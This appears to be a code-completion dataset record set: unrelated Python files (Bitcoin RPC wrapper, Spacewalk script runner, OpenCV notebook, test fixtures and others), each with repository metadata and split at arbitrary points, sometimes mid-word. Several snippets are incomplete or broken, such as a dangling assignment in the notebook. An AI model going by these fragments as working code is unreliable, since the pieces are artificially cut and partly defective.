### #### Note that its subdirectories (if any) are still being watched. If we wanted to remove '/tmp' and all the watches on its sudirectories, we could have done like that:
####
wm.rm_watch(wdd[watchdir], rec=True)
wm.rm_watch(wdd.values())
notifier.stop()
# That is, most of the code is writte
|
n, next, we can add, update or remove watches on files or directories with the same principles.
## The only remaining important task is to stop the thread when we wish stop monitoring, it will automatically destroy the inotify's instance. Call the following method:
# The EventsCodes Class top
# Edited Sun, 26 Nov 2006 10:53
# Event Name Is an Event Description
# IN_ACCESS Yes file was accessed.
# IN_ATTRIB Yes metadata changed.
# IN_CLOSE_NOWRITE Yes unwrittable file was closed.
# IN_CLOSE_WRITE Yes writtable file was closed.
# IN_CREATE Yes file/dir was created in watched directory.
# IN_DELETE Yes file/dir was deleted in watched directory.
# IN_DELETE_SELF Yes watched item itself was deleted.
# IN_DONT_FOLLOW No don't follow a symlink (lk 2.6.15).
# IN_IGNORED Yes raised on watched item removing. Probably useless for you, prefer instead IN_DELETE*.
# IN_ISDIR No event occurred against directory. It is always piggybacked to an event. The Event structure automatically provide this information (via .is_dir)
# IN_MASK_ADD No to update a mask without overwriting the previous value (lk 2.6.14). Useful when updating a watch.
# IN_MODIFY Yes file was modified.
# IN_MOVE_SELF Yes watched item itself was moved, currently its full pathname destination can only be traced if its source directory and destination directory are both watched. Otherwise, the file is still being watched but you cannot rely anymore on the given path (.path)
# IN_MOVED_FROM Yes file/dir in a watched dir was moved from X. Can trace the full move of an item when IN_MOVED_TO is available too, in this case if the moved item is itself watched, its path will be updated (see IN_MOVE_SELF).
# IN_MOVED_TO Yes file/dir was moved to Y in a watched dir (see IN_MOVE_FROM).
# IN_ONLYDIR No only watch the path if it is a directory (lk 2.6.15). Usable when calling .add_watch.
# IN_OPEN Yes file was opened.
# IN_Q_OVERFLOW Yes event queued overflowed. This event doesn't belongs to any particular watch.
# IN_UNMOUNT Yes backing fs was unmounted. Notified to all watches located on this fs.
#
#
# wd (int): is the Watch Descriptor, it is an unique identifier who represents the watched item through which this event could be observed.
# path (str): is the complete path of the watched item as given in parameter to the method .add_watch.
# name (str): is not None only if the watched item is a directory, and if the current event has occurred against an element included in that directory.
# mask (int): is a bitmask of events, it carries all the types of events watched on wd.
# event_name (str): readable event name.
# is_dir (bool): is a boolean flag set to True if the event has occurred against a directory.
# cookie (int): is a unique identifier permitting to tie together two related 'moved to' and 'moved from' events.
#
class MyProcessing(ProcessEvent):
def __init__(self):
"""
Does nothing in this case, but you can as well implement this constructor
and you don't need to explicitely call its base class constructor.
"""
pass
def process_IN_DELETE(event):
"""
This method process a specific kind of event (IN_DELETE). event
is an instance of Event.
"""
print '%s: deleted' % os.path.join(event.path, event.name)
def process_IN_CLOSE(event):
"""
This method is called for these events: IN_CLOSE_WRITE,
IN_CLOSE_NOWRITE.
"""
print '%s: closed' % os.path.join(event.path, event.name)
def process_default(event):
"""
Ult
|
linea-it/dri
|
api/userquery/email.py
|
Python
|
gpl-3.0
| 519 | 0.007707 |
"""
send mail with html template
"""
import logging
from django.template.loader import render
|
_to_string
from common.notify import Notify
class Email:
def __init__(self):
self.logger = logging.getLogger('userquery')
def send(self,
|
data):
self.logger.info("Sending mail by template %s" % data["template"])
subject = "UserQuery - %s" % data["subject"]
body = render_to_string(data["template"], data)
Notify().send_email(subject, body, data["email"])
|
obi-two/Rebelion
|
data/scripts/templates/object/tangible/lair/base/shared_poi_all_lair_thicket_large_evil_fire_red.py
|
Python
|
mit
| 468 | 0.047009 |
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE
|
THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = T
|
angible()
result.template = "object/tangible/lair/base/shared_poi_all_lair_thicket_large_evil_fire_red.iff"
result.attribute_template_id = -1
result.stfName("lair_n","thicket")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
supermikol/coursera
|
Data Structures/Week 1/check_brackets_in_code/check_brackets.py
|
Python
|
mit
| 1,323 | 0.005291 |
# python3
import sys
class Bracket:
def __init__(self, bracket_type, position):
self.bracket_type = bracket_type
self.position = position
def Match(self, c):
if self.bracket_type == '[' and c == ']':
return True
if self.bracket_type == '{' and c == '}':
return True
if self.bracket_type == '(' and c == ')':
return True
return False
if __name__ == "__main__":
text = sys.stdin.read()
opening_brackets_stack = []
index = []
for i, next in enumerate(text):
|
match = True
if next == '(' or next == '[' or next == '{':
# Process opening bracket, write your code here
opening_brackets_stack.append(Bracket(next,i))
index.append(i+1)
if next == ')' or next == ']' or next == '}':
|
if len(opening_brackets_stack) == 0 or opening_brackets_stack.pop().Match(next) == False:
match = False
index.append(i+1)
break
index.pop()
# Process closing bracket, write your code here
# Printing answer, write your code here
if match == False or len(opening_brackets_stack) > 0:
print(index.pop())
else:
print("Success")
|
graveljp/smugcli
|
smugcli/terminal_size.py
|
Python
|
mit
| 2,716 | 0.002577 |
#!/usr/bin/env python
# Source: https://gist.github.com/jtriley/1108174
import os
import shlex
import struct
import platform
import subprocess
def get_terminal_size():
""" getTerminalSize()
- get width and height of console
- works on linux,os x,windows,cygwin(windows)
originally retrieved from:
http://stackoverflow.com/questions/566746/how-to-get-console-window-width-in-python
"""
current_os = platform.system()
tuple_xy = None
if current_os == 'Windows':
tuple_xy = _get_terminal_size_windows()
if tuple_xy is None:
tuple_xy = _get_terminal_size_tput()
# needed for window's python in cygwin's xterm!
if current_os in ['Linux', 'Darwin'] or current_os.startswith('CYGWIN'):
tuple_xy = _get_terminal_size_linux()
if tuple_xy is None:
tuple_xy = (80, 25) # default value
return tuple_xy
def _get_terminal_size_windows():
try:
from ctypes import windll, create_string_buffer
# stdin handle is -10
# stdout handle is -11
# stderr handle is -12
h = windll.kernel32.GetStdHandle(-12)
csbi = create_string_buffer(22)
res = windll.kernel32.GetConsoleScreenBufferInfo(h, csbi)
if res:
(bufx, bufy, curx, cury, wattr,
left, top, right, bottom,
maxx, maxy) = struct.unpack("hhhhHhhhhhh", csbi.raw)
sizex = right - left + 1
sizey = bottom - top + 1
return sizex, sizey
except:
pass
def _get_terminal_size_tput():
# get terminal width
# src: http://stackoverflow.com/questions/263890/how-do-i-find-the-width-height-of-a-terminal-window
try:
cols = int(subprocess.check_call(shlex.split('tput cols')))
rows = int(subprocess.check_call(shlex.split('tput lines')))
return (col
|
s, rows)
except:
pass
def _get_terminal_size_linux():
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
cr = struct.unpack('hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234'))
return cr
except:
pass
c
|
r = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
try:
cr = (os.environ['LINES'], os.environ['COLUMNS'])
except:
return None
return int(cr[1]), int(cr[0])
if __name__ == "__main__":
sizex, sizey = get_terminal_size()
print('width =', sizex, 'height =', sizey)
|
dirkjot/pingpongcam
|
opencv/exploration-3.py
|
Python
|
gpl-3.0
| 8,044 | 0.010816 |
# coding: utf-8
# Given code that can extract the contents of the inner rectangles (boxes), we can determine whether the
# contents have changed.
#
# Here, take an image of the previous box and see whether the same contents are still there. The idea is that
# a name does not only get erased, it may also be replaced. We hope to find something more robust than the ink
# method (exploration-2).
#
# In[1]:
LIVENOTEBOOK = True
import cv2
cv2.__version__
import extract_blue_grid
get_contents = extract_blue_grid.get_contents
# In[2]:
def get_content1(imagepath):
"return 2nd box and contour from get_contents"
boxes, contours = get_contents(imagepath)
return boxes[1], contours[1]
# In[3]:
import numpy as np
import matplotlib.pyplot as plt
from skimage.measure import compare_ssim
def imshow(img): plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))
imwriting1 = cv2.imread("../reference/frame276.png")
imwriting2 = cv2.imread("../reference/frame280.png")
imempty = cv2.imread("../reference/frame272.png")
if LIVENOTEBOOK:
get_ipython().magic(u'matplotlib inline')
# test plotting
imshow(np.concatenate([imwriting1,imwriting2,imempty], axis=1))
# In[ ]:
# not used:
def threshold_boxes(boxes):
"""Given a list of images, adaptive threshold each image"""
output = []
for img in boxes:
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
dst = cv2.adaptiveThreshold(img, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
output.append(dst)
return output
# In[4]:
get_ipython().magic(u'matplotlib inline')
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (9, 9))
writing1,contours1 = get_content1("../reference/frame276.png")
writing1 = cv2.morphologyEx(writing1, cv2.MORPH_OPEN, kernel)
writing1 = cv2.cvtColor(writing1, cv2.COLOR_BGR2GRAY)
#writing1 = cv2.adaptiveThreshold(writing1, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
writing2,contours2 = get_content1("../reference/frame280.png")
writing2 = cv2.morphologyEx(writing2, cv2.MORPH_OPEN, kernel)
writing2 = cv2.cvtColor(writing2, cv2.COLOR_BGR2GRAY)
#writing2 = cv2.adaptiveThreshold(writing2, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
empty,contoursempty = get_content1("../reference/frame272.png
|
")
empty = cv2.morphologyEx(empty, cv2.MORPH_OPEN, kernel)
empty = cv2.cvtColor(empty, cv2.COLOR_BGR2GRAY)
#empty = cv2.adaptiveThreshold(empty, 160, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 5, 2)
plt.imshow(np.concatenate([writing1,writing2,empty]))
#plt.imshow(writing1)
#writing1.shape, writing2.shape, em
|
pty.shape
# In[5]:
writingb, contoursb = get_content1("../reference/frame274.png")
writingb = cv2.morphologyEx(writingb, cv2.MORPH_OPEN, kernel)
writingb = cv2.cvtColor(writingb, cv2.COLOR_BGR2GRAY)
writingc, contoursc = get_content1("../reference/frame275.png")
writingc = cv2.morphologyEx(writingc, cv2.MORPH_OPEN, kernel)
writingc = cv2.cvtColor(writingc, cv2.COLOR_BGR2GRAY)
plt.imshow(np.concatenate([writing1,writingb,writingc]))
# In[6]:
# matching does not work on a whole image: it looks like it does:
img = writing1.copy()
method = cv2.TM_SQDIFF
w, h = writing1.shape[::-1]
res = cv2.matchTemplate(writingb,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val )
plt.imshow(img)
# In[ ]:
# but it another word too
img = writing2.copy()
method = cv2.TM_SQDIFF
w, h = img.shape[::-1]
res = cv2.matchTemplate(img,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val)
plt.imshow(img)
# In[ ]:
# and it matches empty just as well..
img = empty.copy()
method = cv2.TM_SQDIFF
w, h = img.shape[::-1]
res = cv2.matchTemplate(img,writing1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = min_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img,top_left, bottom_right, 255, 2)
print(top_left, bottom_right, "%2.2e" % min_val)
plt.imshow(img)
# so the first result (2 up ) sounds like the whole img got recognized, great. but retrying it with another word and empty shows we recognize almost everything. There are variations in value but they are pretty close, given all the noise around the image.
#
# i think we should:
# - straighten out the image
# - take a template just around the word bravo
# - then match against a straightened target image
# - the straightening may not be nec (may you write crooked) but template matching is on rects.
#
#
# ### Let's try this out with a hand made template without straightening
#
# In[7]:
template = cv2.imread('template.png') # used gimp to cut it
template = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
plt.imshow(template)
# In[ ]:
def frame_img(img, dim):
"put image in a black frame so resulting image has shape dim"
framed = np.zeros(dim, dtype=img.dtype)
jx, jy = np.trunc((np.array(dim) - np.array(img.shape))/2).astype(int)
assert jx>0 and jy>0, "Image must be smaller than desired dimensions"
framed[jx:jx+img.shape[0], jy:jy+img.shape[1]] = img
return framed
def locate_template(img, template):
"Find template in image and produce stats + image "
img1 = img.copy()
# method = cv2.TM_SQDIFF, tried this first, works less well and gives numbers that are harder to
# interpret. For sqdiff, lower is better and non-id copies were around 1e6, alpha around 4e6
method = cv2.TM_CCOEFF_NORMED
w, h = template.shape[::-1]
res = cv2.matchTemplate(template,img1,method)
min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)
top_left = max_loc
bottom_right = (top_left[0] + w, top_left[1] + h)
cv2.rectangle(img1,top_left, bottom_right, 128, 2)
print("best val, res.min, res.max:", min_val/1e6, res.min(), res.max())
#framed = frame_img(res, img1.shape)
# this does not work because the scale (min-max) of framed is very different from res.
#plt.imshow(np.concatenate([img1.astype(np.float32)*np.mean(framed), framed.astype(np.float32)]), cmap="gray")
plt.imshow(img1.astype(np.float32), cmap="gray")
return max_val, img1
value, _ = locate_template(writing1, template)
value
# In[ ]:
# for SQDIFF this one scored quite high, with COEFF_NORMED it is fine.
value, _ = locate_template(writingb, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(writingc, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(writing2, template)
"value %2.2e" % value
# In[ ]:
value, _ = locate_template(empty, template)
"value %2.2e" % value
# ## So we have to find that template and we are in business
# In[8]:
contours1.shape # shape of box shown in writing1
# In[9]:
def scale_contour(contour, scale):
"Shrinks or grows a contour by the given factor"
moments = cv2.moments(contour)
midX = int(round(moments["m10"] / moments["m00"]))
midY = int(round(moments["m01"] / moments["m00"]))
mid = np.array([midX,midY])
contour = contour - mid
contour = (contour * scale).astype(np.int32)
contour += mid
return contour
# In[14]:
c = contours1
dst = np.dstack([writing1.copy(), np.zeros_like(writing1), np.zeros_like(writing1)])
dst = cv2.drawContours(dst, [c], -1, (0,255,0), 3)
peri = 0.01 * cv2.arcLength(c, True) # approximate such that new perimeter is 1% of old one
approx = cv2.approxPolyDP(c, peri, True)
approx = scale_contour(approx, 0.8)
dst = cv2.drawContours(dst, [approx], -1, (0,175,0), 3)
imshow(dst)
#plt.imshow(dst, cmap="gray")
template1 =
# In[ ]:
# In[ ]:
img = np.zeros((141, 390,3), dtype=np.uint8)
img[:]=(240,240,240)
cv2.drawContours(img, [contours1], -1, (8,255,5), 3)
imshow(img)
# In[ ]:
# In[ ]:
# In[ ]:
# In[ ]:
|
BTCX/BTCX_blockchain
|
btcxblockchainapi/btcrpc/utils/btc_rpc_call.py
|
Python
|
mit
| 3,371 | 0.009789 |
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from btcrpc.utils.config_file_reader import ConfigFileReader
import json
import socket, errno
from btcrpc.utils.log import *
log = get_log("BTCRPCCall:")
class BTCRPCCall(object):
def __init__(self, wallet="receive", currency="btc"):
yml_config_reader = ConfigFileReader()
url = yml_config_reader.get_rpc_server(currency=currency, wallet=wallet)
self.access = AuthServiceProxy(url)
def do_getinfo(self):
return self.access.getinfo()
def do_get_new_address(self):
return self.access.getnewaddress();
def do_set_account(self, address, account):
return self.access.setaccount(address, account)
def do_get_transaction(self, txid):
try:
return self.access.gettransaction(txid)
except RuntimeError:
|
# return simplejson.dumps ({u'error' : u'txid is not valid'})
return None
|
def do_list_transactions(self, account, count=10, from_index=0):
try:
return self.access.listtransactions(account, count, from_index)
except RuntimeError:
print("calling failure")
def do_get_transaction(self, tx_id):
try:
return self.access.gettransaction(tx_id)
except RuntimeError:
#return simplejson.dumps ({u'error' : u'txid is not valid'})
return None
def amount_received_by_address(self, address="", confirms=0):
return self.access.getreceivedbyaddress(address, confirms)
def do_validate_address(self, address=""):
return self.access.validateaddress(address)
def list_transactions(self, account="", count=10, from_index=0):
return self.access.listtransactions(account, count, from_index)
def send_from(self, from_account="", to_address="", amount=0, minconf=1):
return self.access.sendfrom(from_account, to_address, amount, minconf)
def get_received_amount_by_account(self, account="", minconf=1):
return self.access.getreceivedbyaccount(account, minconf)
def get_balance(self, account="", minconf=1):
return self.access.getbalance(account, minconf)
def get_wallet_balance(self):
return self.access.getbalance()
def move(self, from_account="", to_account="", amount=0, minconf=1):
return self.access.move(from_account, to_account, amount, minconf)
def list_accounts(self, confirmations=1):
return self.access.listaccounts(confirmations)
def list_received_by_address(self, confirmations=1, include_empty=False):
return self.access.listreceivedbyaddress(confirmations, include_empty)
def get_addresses_by_account(self, account):
return self.access.getaddressesbyaccount(account)
def set_tx_fee(self, amount):
return self.access.settxfee(amount)
def send_to_address(self, address, amount, subtractfeefromamount=True):
return self.access.sendtoaddress(address, amount, "", "", subtractfeefromamount)
# amount is type of dictionary
def send_many(self, from_account="", minconf=1, **amounts):
log.info("From account: %s", from_account)
log.info("To accounts: %s", json.dumps(amounts))
amounts_string = json.dumps(amounts['amounts'])
amounts_object = json.loads(amounts_string)
try:
return True, self.access.sendmany(from_account, amounts_object, minconf)
except JSONRPCException as ex:
return False, ex
except socket.error as e:
return False, e
|
snyaggarwal/oclapi
|
ocl/test_helper/base.py
|
Python
|
mpl-2.0
| 10,616 | 0.004333 |
import random
import string
from collection.models import CollectionVersion, Collection
from concepts.models import Concept, ConceptVersion, LocalizedText
from oclapi.models import ACCESS_TYPE_EDIT, ACCESS_TYPE_VIEW
from orgs.models import Organization
from sources.models import Source, SourceVersion
from users.models import UserProfile
from mappings.models import Mapping, MappingVersion
from django.contrib.auth.models import User
from django.test import TestCase
class OclApiBaseTestCase(TestCase):
def setUp(self):
self._clear_fixtures()
self.user = create_user()
org_ocl = create_organization("OCL")
create_lookup_concept_classes(self.user, org_ocl)
def _clear_fixtures(self):
LocalizedText.objects.filter().delete()
ConceptVersion.objects.filter().delete()
Concept.objects.filter().delete()
MappingVersion.objects.filter().delete()
Mapping.objects.filter().delete()
SourceVersion.objects.filter().delete()
Source.objects.filter().delete()
CollectionVersion.objects.filter().delete()
Collection.objects.filter().delete()
Organization.objects.filter().delete()
UserProfile.objects.filter().delete()
User.objects.filter().delete()
def tearDown(self):
self._clear_fixtures()
def generate_random_string(length=5):
return ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(length))
def create_localized_text(name, locale='en', type='FULLY_SPECIFIED', locale_preferred=False):
return LocalizedText(name=name, locale=locale, type=type, locale_preferred=locale_preferred)
def create_user():
suffix = generate_random_string()
user = User.objects.create_user(
username="test{0}".format(suffix),
password="test{0}".format(suffix),
email='user{0}@test.com'.format(suffix),
first_name='Test',
last_name='User'
)
create_user_profile(user)
# set password again as create_user hashed it
user.password = "test{0}".format(suffix)
return user
def create_user_profile(user):
suffix = generate_random_string()
mnemonic = user.username if user else 'user{0}'.format(suffix)
return UserProfile.objects.create(user=user, mnemonic=mnemonic)
def create_organization(name=None, mnemonic=None):
suffix = generate_random_string()
name = name if name else 'org{0}'.format(suffix)
mnemonic = mnemonic if mnemonic else name
return Organization.objects.create(name=name, mnemonic=mnemonic)
def create_source(user, validation_schema=None, organization=None, name=None):
suffix = generate_random_string()
source = Source(
name=name if name else "source{0}".format(suffix),
mnemonic=name if name else "source{0}".format(suffix),
full_name=name if name else "Source {0}".format(suffix),
source_type='Dictionary',
public_access=ACCESS_TYPE_EDIT,
default_locale='en',
supported_locales=['en'],
website='www.source.com',
description='This is a test source',
custom_validation_schema=validation_schema
)
if organization is not None:
kwargs = {
'parent_resource': organization
}
else:
kwargs = {
'parent_resource': UserProfile.objects.get(user=user)
}
Source.persist_new(source, user, **kwargs)
return Source.objects.get(id=source.id)
def create_collection(user, validation_schema=None, name=None):
suffix = generate_random_string()
collection = Collection(
name=name if name else "collection{0}".format(suffix),
mnemonic=name if name else "collection{0}".format(suffix),
full_name=name if name else "Collection {0}".format(suffix),
colle
|
ction_type='Dictionary',
public_access=ACCESS_TYPE_EDIT,
default_locale='en',
supported_locales=['en'],
website='www.collection2.com',
|
description='This is the second test collection',
custom_validation_schema=validation_schema
)
kwargs = {
'parent_resource': UserProfile.objects.get(user=user)
}
Collection.persist_new(collection, user, **kwargs)
return Collection.objects.get(id=collection.id)
def create_concept(user, source, source_version=None, names=None, mnemonic=None, descriptions=None, concept_class=None, datatype=None,
force=False, extras=None):
suffix = generate_random_string()
if not names and not force:
names = [create_localized_text("name{0}".format(suffix))]
if not mnemonic and not force:
mnemonic = 'concept{0}'.format(suffix)
if not descriptions and not force:
descriptions = [create_localized_text("desc{0}".format(suffix))]
concept = Concept(
mnemonic=mnemonic,
updated_by=user,
datatype=datatype if datatype else "None",
concept_class=concept_class if concept_class else 'Diagnosis',
names=names,
descriptions=descriptions,
extras=extras
)
if source is not None:
kwargs = {
'parent_resource': source,
}
if source_version is not None:
kwargs['parent_resource_version'] = source_version
errors = Concept.persist_new(concept, user, **kwargs)
else:
errors = Concept.persist_new(concept, user)
return concept, errors
def create_mapping(user, source, from_concept, to_concept, map_type="SAME-AS", mnemonic=None):
mapping=None
if mnemonic:
mapping = Mapping(mnemonic=mnemonic, created_by=user, updated_by=user, parent=source, map_type=map_type,
from_concept=from_concept, to_concept=to_concept, public_access=ACCESS_TYPE_VIEW,)
else:
mapping = Mapping(created_by=user, updated_by=user, parent=source, map_type=map_type,
from_concept=from_concept, to_concept=to_concept, public_access=ACCESS_TYPE_VIEW, )
kwargs = {
'parent_resource': source,
}
Mapping.persist_new(mapping, user, **kwargs)
return Mapping.objects.get(id=mapping.id)
def create_lookup_concept_classes(user, org_ocl):
classes_source = create_source(user, organization=org_ocl, name="Classes")
datatypes_source = create_source(user, organization=org_ocl, name="Datatypes")
nametypes_source = create_source(user, organization=org_ocl, name="NameTypes")
descriptiontypes_source = create_source(user, organization=org_ocl, name="DescriptionTypes")
maptypes_source = create_source(user, organization=org_ocl, name="MapTypes")
locales_source = create_source(user, organization=org_ocl, name="Locales")
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Diagnosis")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Drug")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Test")])
create_concept(user, classes_source, concept_class="Concept Class", names=[create_localized_text("Procedure")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("None"), create_localized_text("N/A")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Numeric")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Coded")])
create_concept(user, datatypes_source, concept_class="Datatype", names=[create_localized_text("Text")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("FULLY_SPECIFIED"), create_localized_text("Fully Specified")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("Short"), create_localized_text("SHORT")])
create_concept(user, nametypes_source, concept_class="NameType",
names=[create_localized_text("INDEX_TERM"), create_localized_text("Index Term")])
create_concept(use
|
jhutar/spacewalk
|
client/tools/rhncfg/actions/script.py
|
Python
|
gpl-2.0
| 9,141 | 0.002297 |
#
# Copyright (c) 2008--2016 Red Hat, Inc.
#
# This software is licensed to you under the GNU General Public License,
# version 2 (GPLv2). There is NO WARRANTY for this software, express or
# implied, including the implied warranties of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2
# along with this software; if not, see
# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.
#
# Red Hat trademarks are not licensed under GPLv2. No permission is
# granted to use or replicate Red Hat trademarks that are incorporated
# in this software or its documentation.
#
import os
import sys
import pwd
import grp
import time
import select
import signal
import tempfile
import base64
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# this is ugly, hopefully it will be natively supported in up2date
from actions.configfiles import _local_permission_check, _perm_error
from config_common import local_config
from config_common.rhn_log import set_logfile, log_to_file
sys.path.append('/usr/share/rhn')
from up2date_client import config
# this is a list of the methods that get exported by a module
__rhnexport__ = [
'run',
]
# action version we understand
ACTION_VERSION = 2
# SystemExit exception error code
SYSEXIT_CODE = 3
class SignalHandler:
def __init__(self):
self.gotSigterm = False
# Handle SIGTERM so that we can return status to Satellite
def handle(self, signal, frame):
self.gotSigterm = True
raise SystemExit(SYSEXIT_CODE)
def _create_script_file(script, uid=None, gid=None):
storageDir = tempfile.gettempdir()
script_path = os.path.join(storageDir, 'rhn-remote-script')
# Loop a couple of times to try to get rid of race conditions
for i in range(2):
try:
fd = os.open(script_path, os.O_RDWR | os.O_CREAT | os.O_EXCL, int("0700", 8))
# If this succeeds, break out the loop
break
except OSError:
e = sys.exc_info()[1]
if e.errno != 17: # File exists
raise
# File does exist, try to remove it
try:
os.unlink(script_path)
except OSError:
e = sys.exc_info()[1]
if e.errno != 2: # No such file or directory
raise
else:
# Tried a couple of times, failed; bail out raising the latest error
raise
sf = os.fdopen(fd, 'wb')
sf.write(script.encode("utf-8"))
sf.close()
if uid and gid:
os.chown(script_path, uid, gid)
return script_path
# Make sure the dir-path to a file exists
def _create_path(fpath):
d = os.path.dirname(fpath)
if d and not os.path.exists(d):
os.makedirs(d, int("0700", 8))
return os.path.exists(d)
def run(action_id, params, cache_only=None):
# Setup SIGTERM handler
sHandler = SignalHandler()
signal.signal(signal.SIGTERM, sHandler.handle)
cfg = config.initUp2dateConfig()
local_config.init('rhncfg-client', defaults=dict(cfg.items()))
tempfile.tempdir = local_config.get('script_tmp_dir')
logfile_name = local_config.get('script_log_file')
log_output = local_config.get('script_log_file_enable')
if log_output:
# If we're going to log, make sure we can create the logfile
_create_path(logfile_name)
if cache_only:
return (0, "no-ops for caching", {})
action_type = 'script.run'
if not _local_permission_check(action_type):
return _perm_error(action_type)
extras = {'output':''}
script = params.get('script')
if not script:
return (1, "No script to execute", {})
username = params.get('username')
groupname = params.get('groupname')
if not username:
return (1, "No username given to execute script as", {})
if not groupname:
return (1, "No groupname given to execute script as", {})
timeout = params.get('timeout')
if timeout:
try:
timeout = int(timeout)
except ValueError:
return (1, "Invalid timeout value", {})
else:
timeout = None
db_now = params.get('now')
if not db_now:
return (1, "'now' argument missing", {})
db_now = time.mktime(time.strptime(db_now, "%Y-%m-%d %H:%M:%S"))
now = time.time()
process_start = None
process_end = None
child_pid = None
# determine uid/ugid for script ownership, uid also used for setuid...
try:
user_record = pwd.getpwnam(username)
except KeyError:
return 1, "No such user %s" % username, extras
uid = user_record[2]
ugid = user_record[3]
# create the script on disk
try:
script_path = _create_script_file(script, uid=uid, gid=ugid)
except OSError:
e = sys.exc_info()[1]
return 1, "Problem creating script file: %s" % e, extras
# determine gid to run script as
try:
group_record = grp.getgrnam(groupname)
except KeyError:
return 1, "No such group %s" % groupname, extras
run_as_gid = group_record[2]
# create some pipes to communicate w/ the child process
(pipe_read, pipe_write) = os.pipe()
process_start = time.time()
child_pid = os.fork()
if not child_pid:
# Parent doesn't write to child, so close that part
os.close(pipe_read)
# Redirect both stdout and stderr to the pipe
os.dup2(pipe_write, sys.stdout.fileno())
os.dup2(pipe_write, sys.stderr.fileno())
# Close unnecessary file descrip
|
tors (including pipe since it's duped)
for i in range(3, MAXFD):
try:
os.close(i)
except:
pass
# all scripts initial working directory will be /
# puts burden on script writer to ensure cwd is correct within the
# script
os.chdir('/')
# the child process gets the desired uid/gid
os.setgid(run_as_gid)
groups=[
|
g.gr_gid for g in grp.getgrall() if username in g.gr_mem or username in g.gr_name]
os.setgroups(groups)
os.setuid(uid)
# give this its own process group (which happens to be equal to its
# pid)
os.setpgrp()
# Finally, exec the script
try:
os.umask(int("022", 8))
os.execv(script_path, [script_path, ])
finally:
# This code can be reached only when script_path can not be
# executed as otherwise execv never returns.
# (The umask syscall always succeeds.)
os._exit(1)
# Parent doesn't write to child, so close that part
os.close(pipe_write)
output = None
timed_out = None
out_stream = tempfile.TemporaryFile()
while 1:
select_wait = None
if timeout:
elapsed = time.time() - process_start
if elapsed >= timeout:
timed_out = 1
# Send TERM to all processes in the child's process group
# Send KILL after that, just to make sure the child died
os.kill(-child_pid, signal.SIGTERM)
time.sleep(2)
os.kill(-child_pid, signal.SIGKILL)
break
select_wait = timeout - elapsed
# XXX try-except here for interrupted system calls
input_fds, output_fds, error_fds = select.select([pipe_read], [], [], select_wait)
if error_fds:
# when would this happen?
os.close(pipe_read)
return 1, "Fatal exceptional case", extras
if not (pipe_read in input_fds):
# Read timed out, should be caught in the next loop
continue
output = os.read(pipe_read, 4096)
if not output:
# End of file from the child
break
out_stream.write(output)
os.close(pipe_read)
# wait for the child to complete
(somepid, exit_status) = os.waitpid(child_pid, 0)
process_end = time.time()
# Copy the output from the temporary file
out_stream.seek(0, 0)
extras['output'] = out_stream.read()
out_stream.close(
|
Dev-Cloud-Platform/Dev-Cloud
|
dev_cloud/cc1/src/wi/tests/cm_networks_test.py
|
Python
|
apache-2.0
| 4,435 | 0.00203 |
# -*- coding: utf-8 -*-
# @COPYRIGHT_begin
#
# Copyright [2010-2014] Institute of Nuclear Physics PAN, Krakow, Poland
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# @COPYRIGHT_end
# -*- coding: utf-8 -*-
"""@package src.wi.tests.cm_networks_test
@author Piotr Wójcik
@author Krzysztof Danielowski
@date 09.01.2013
"""
from wi.tests import WiTestCase
import unittest
